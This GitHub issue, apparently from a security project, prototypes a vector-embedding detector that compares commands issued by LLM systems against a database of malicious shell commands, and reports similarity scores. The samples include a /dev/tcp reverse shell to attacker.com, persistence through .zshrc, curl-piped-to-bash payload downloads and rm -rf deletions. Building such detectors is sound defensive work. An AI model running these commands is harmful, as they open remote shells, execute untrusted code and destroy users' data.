Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Command embedding #730

Open
poppysec opened this issue Jan 22, 2025 · 1 comment
Open

Command embedding #730

poppysec opened this issue Jan 22, 2025 · 1 comment
Assignees

Comments

@poppysec
Copy link
Member

poppysec commented Jan 22, 2025

Aim: Explore a basic prototype for creating a vector database of malicious shell commands to compare LLM system commands to.

  1. Create vector database file
  2. Selective normalisation for file paths, usernames, variables etc
  3. Create embeddings of normalised command
  4. Read Promptwright JSONL dataset, input embeddings to DB
  5. Use some similarity metric to compare an input to the entries in the DB
  6. Test with known malicious and known benign cases

To do:

  • Look into specialised embeddings models for dealing with code rather than generic text
  • Consider options for normalisation
  • Consider options for similarity metric use
  • How to deal with the malicious command being surrounded by benign commands
@poppysec
Copy link
Member Author

poppysec commented Jan 22, 2025

Embeddings models

I tried out huggingface/CodeBERTa-small-v1 but the performance was quite poor. The false positive rate was high even for very high similarity scores.

Salesforce/codet5-base is specifically pretrained for tasks involving code and commands, and has cross-language support. So far the performance is better.

e.g. getting top 3 most similar (by cosine similarity) from the vector DB

Some known malicious examples

Results for bash -i >& /dev/tcp/attacker.com/4444 0>&1

Description: Modifying a user's .zshrc file to persistently execute malicious code.
Command: echo 'bash -i >& /dev/tcp/attacker.com/<PORT> <PORT>>&<PORT>' >> ~/.zshrc
Similarity: 0.9167367815971375

Description: Establishing a reverse shell using bash history manipulation.
Command: echo 'bash -i >& /dev/tcp/attacker.com/<PORT> <PORT>>&<PORT>' >> ~/.bash_history
Similarity: 0.9134513735771179

Description: Malicious modification of hidden files to evade detection
Command: echo 'bash -i >& /dev/tcp/attacker.com/<PORT> <PORT>>&<PORT>' >> ~/.Spotlight-V100
Similarity: 0.9072197079658508

Results for curl -fsSL http://malicious-url.com/beacon.sh | bash

Description: Sudo misuse: Installing malicious software silently.
Command: sudo curl -sL <URL> | bash
Similarity: 0.9223264455795288

Description: Malicious shell command to download and execute a payload from an onion service using Tor.
Command: curl -s --url '<URL>' | bash
Similarity: 0.8874844312667847

Description: Hidden process: Executing malicious payload directly in memory using bash.
Command: /bin/bash -c "curl -fsSL <URL> | bash"
Similarity: 0.8489115238189697

Results for rm -rf ~/Documents/*

Description: Malicious removal of files using rm command
Command: rm -rf ~/Documents/*
Similarity: 1.0000001192092896

Description: Executing destructive operations by deleting sensitive directories
Command: rm -rf ~/Documents/ImportantFiles/*
Similarity: 0.8761441707611084

Description: Deleting files in /Users/ using sudo without timestamp.
Command: sudo rm -rf /Users/*
Similarity: 0.8414553999900818

Known benign examples

Results for cd ~/Documents

Description: Deleting files recursively using rm
Command: rm -rf /Users
Similarity: 0.6979251503944397

Description: Malicious removal of files using rm command
Command: rm -rf ~/Documents/*
Similarity: 0.6330024600028992

Description: Sudo misuse: Executing unauthorized command using sudo.
Command: sudo rm -rf /important/data
Similarity: 0.6205794811248779

Results for mkdir Projects

Description: Deleting files recursively using rm
Command: rm -rf /Users
Similarity: 0.6372671127319336

Description: Escalating privileges using sudo su
Command: sudo su
Similarity: 0.5862594842910767

Results for brew update

Description: Enumerate all user IDs using 'getent' command.
Command: getent passwd
Similarity: 0.6533409953117371

Description: Sudo misuse: Escalating privileges by executing an arbitrary command
Command: sudo -i
Similarity: 0.6374186873435974

Description: Escalating privileges using sudo -i to gain root access
Command: sudo -i
Similarity: 0.6374186873435974

We would need a high similarity threshold such as 0.85 or 0.9

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants